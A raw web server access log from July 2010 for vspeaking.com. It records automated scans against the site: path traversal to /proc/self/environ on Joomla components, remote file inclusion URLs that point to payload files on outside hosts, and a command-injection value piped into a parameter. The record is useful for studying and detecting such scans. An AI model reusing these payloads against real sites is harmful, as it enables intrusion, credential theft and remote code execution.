85.71.165.8 - - [26/Jul/2010:16:41:38 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "vspeaking.com"
85.71.165.8 - - [26/Jul/2010:16:41:39 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "vspeaking.com"
85.71.165.8 - - [26/Jul/2010:16:41:40 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "vspeaking.com"
85.71.165.8 - - [26/Jul/2010:16:41:40 -0700] "GET /logs/access.log HTTP/1.1" 200 449624 "http://vspeaking.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:16:47:14 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:16:47:15 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:16:47:17 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
95.211.71.21 - - [26/Jul/2010:16:48:27 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:16:48:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
222.124.193.12 - - [26/Jul/2010:16:48:46 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
222.124.193.12 - - [26/Jul/2010:16:48:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
222.124.193.12 - - [26/Jul/2010:16:48:48 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.112.35.54 - - [26/Jul/2010:16:48:53 -0700] "GET /logs/access_100705.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.vspeaking.com"
217.112.35.54 - - [26/Jul/2010:16:48:54 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.vspeaking.com"
217.112.35.54 - - [26/Jul/2010:16:48:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:50:47 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:50:47 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:50:47 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:50:59 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:50:59 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:16:51:00 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
212.97.32.106 - - [26/Jul/2010:16:51:32 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
212.97.32.106 - - [26/Jul/2010:16:51:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
212.97.32.106 - - [26/Jul/2010:16:51:32 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
217.112.35.54 - - [26/Jul/2010:16:52:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:16:56:52 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
202.47.80.12 - - [26/Jul/2010:16:56:52 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:16:58:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:16:58:55 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:16:58:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:08 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:08 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:09 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:22 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:23 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
95.211.71.21 - - [26/Jul/2010:17:06:23 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
85.71.165.8 - - [26/Jul/2010:17:06:55 -0700] "GET /logs/access_100726.log HTTP/1.1" 200 3446806 "http://vspeaking.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:17:08:44 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.vspeaking.com"
222.124.212.222 - - [26/Jul/2010:17:08:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:17:32:01 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:17:32:01 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
211.169.249.251 - - [26/Jul/2010:17:32:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:38 -0700] "GET /logs/access_100607.log/inc/header.php/step_one.php?server_inc=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:38 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/access_100607.log/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/access_100607.log/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/access_100607.log/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:39 -0700] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:40 -0700] "GET /inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:34:40 -0700] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:34:46 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:34:46 -0700] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:34:46 -0700] "GET /logs/access.log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:37:15 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:37:15 -0700] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:37:15 -0700] "GET /logs/access.log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:38:03 -0700] "GET /logs/access_100517.log/inc/header.php/step_one.php?server_inc=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:38:04 -0700] "GET /logs/access_100517.log/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:38:04 -0700] "GET /logs/access_100517.log/inc/header.php/step_one.php?server_inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [26/Jul/2010:17:38:05 -0700] "GET /logs/access_100517.log/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:44:32 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
69.175.118.101 - - [26/Jul/2010:17:44:32 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.vspeaking.com"
222.124.212.222 - - [26/Jul/2010:17:51:22 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:17:51:23 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
222.124.212.222 - - [26/Jul/2010:17:51:23 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "vspeaking.com"
94.23.8.200 - - [26/Jul/2010:17:54:07 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /logs/access.log//index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /logs/access.log//index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /logs//index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:07:56 -0700] "GET /logs//index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:08:16 -0700] "GET /index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:08:29 -0700] "GET /index.php?option=com_jeajaxeventcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:18:14:54 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:14:58 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:16:47 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:16:47 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
81.21.78.22 - - [26/Jul/2010:18:16:48 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:19:54 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:18:23:34 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:18:23:34 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
74.55.73.74 - - [26/Jul/2010:18:23:34 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:25:29 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:25:35 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:25:36 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /logs/access.log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2230 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /logs/access.log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2230 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:36 -0700] "GET /logs/access.log//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:37 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "vspeaking.com"
72.55.153.180 - - [26/Jul/2010:18:30:37 -0700] "GET /logs//?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2230 "-" "libwww-perl/5.805" "vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:32:55 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:32:56 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:18:33:03 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.41.233.128 - - [26/Jul/2010:18:33:03 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:33:20 -0700] "GET /logs/access.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:33:20 -0700] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:33:20 -0700] "GET /logs///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:07 -0700] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:07 -0700] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:08 -0700] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:08 -0700] "GET /logs///skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:10 -0700] "GET //skin/board/moviefl/download.php?board_skin_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:18:37:10 -0700] "GET //skin/board/moviefl/download.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:44:23 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2225 "-" "libwww-perl/5.803" "www.vspeaking.com"
91.121.67.226 - - [26/Jul/2010:18:44:24 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
94.23.8.200 - - [26/Jul/2010:18:48:05 -0700] "GET /logs/access_100607.log///index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
